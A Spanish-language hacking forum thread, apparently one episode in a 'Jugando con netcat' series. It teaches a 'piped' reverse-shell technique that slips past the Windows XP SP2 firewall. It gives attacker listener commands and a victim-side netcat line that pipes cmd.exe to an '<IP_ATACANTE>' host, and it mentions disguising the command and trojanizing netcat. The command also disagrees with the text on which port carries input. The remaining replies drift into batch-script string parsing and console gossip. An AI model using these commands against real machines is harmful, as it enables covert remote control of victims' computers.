Sobretodo el de shell pipelada o volteada, lo que pasa es que yo veia necesario explicarlo, es el unico metodo de saltarse el firewall unicamente usando el Netcat...

Ya estan puestas las fotos de Jugando con netcat VI

Impresionante... eso si que es talento...   

Shell volteada o pipelada:


Bien hasta ahora nosotros conocemos la tecnica de la shell directa e inversa, probemos la inversa, nos las ingeniamos para que la victima deje un puerto a la escucha...




Este comando camuflado con el metodo del iexplore tendria el mismo efecto, hace saltar el firewall de XP SP2 !!, y por lo tanto nosotros no nos podemos conectar a la victima...



EL firewall de XP SP2 detecta que actua como un servidor y lo bloquea!!

Asi, que que podemos hacer ??, pues una shell pipelada o volteada.

Esta técnica se basa en que la mayoria de los firewall aceptan la entrada de datos por el puerto 21 y la salida de estos por el puerto 25, de esta manera podemos burlar al firewall sin matarlo ni agregar el Netcat a la lista de excepciones.

El atacante deberá ejecutar los comandos:


nc –vv –L –p 21  --> La ventana por la que dará las ordenes
nc –vv –L –p 25 --> La ventana por la cual verá el resultado de las mismas.




Y la víctima debe ejecutar:
 
nc –d <IP_ATACANTE> 80 | cmd.exe | nc –d <IP_ATACANTE> 25



Explicacion:

Usamos " pipes ", esto es basicamente un metodo para transmitir datos entre programas, nos conectamos al puerto 21 del atacante, todo lo que recibamos por ese puerto será redirigido a cmd.exe usando " | ", el resultado que dé cmd.exe será a la vez redirigido a la conexion que tenemos con el puerto 25 de la victima.

Por ese motivo las ordenes o comandos debemos escribirlos en la ventana en la que escuchemos el puerto 21 y recibiremos el resultado en el puerto 25.

Por que usamos el puerto 21 (FTP) ?

Pues por que el firewall de XP SP2 admite por defecto la entrada de datos por dicho puertos, como tambien la admite por el puerto 80, etc...

Por que usamos el puerto 25 (SMTP) ?

Pues basicamente lo mismo que lo anterior, pero en este caso lo permitido es la salida de datos.



Entonces en la nos saldra esto:





En la ventana donde escuchamos el puerto 21 escribiremos los comandos y en la que usamos el puerto 25 veremos el resultado...

Y todo esto sin que el firewall no diga ni pio!!, la unica forma de que nos funcione un Netcatt troyanizado usando unicamente el Netcat para esquivar el firewall...

Gracias.

A esto le falta un " Jugando con el Netcat VI ", shell pipelada o volteada...

Voy a ponerme a hacerlo.

En vez de

tambien podemos usar un :

si la vicitma tiene un puerto en escucha, o si en puerto en escucha es el nuestro:


Prefiero usar el metodo de conectarte... usar puerto 21 que el firewall SP2 no cantara....

Si, con el FOR saco la variable:

"nombre_de_cadena"="valor_cadena"

Hago un set variable=%variable:"=%

Y sale asi:

nombre_de_cadena=valor_cadena

Ahhh !! se me acaba de ocurrir un metodo para sacar solo lo que hay a la derecha del igual.

En un bucle cojemos y quitamos el primer caracter, si el caracter que hemos quitado es un "=" paramos, y si no quitamos el segundo caracter y hacemos lo mismo.

Entonces sacamos solo la parte que hay a la derecha del " = "

Yo le enviaria un privado...

Na, que sigues sin entender...

Es cojer el valor de una cadena y guardarlo en una variable.

Os imaginais en la unidad de quemados...
los afectados por jugar con una consola pasen a la sala de espera ...

Yo he oido que gastanmucha pasta en construir una PS3 y que la pensaban rentabilizar con los juegos, de todas formas no se si la llegare a comprar, tan cara...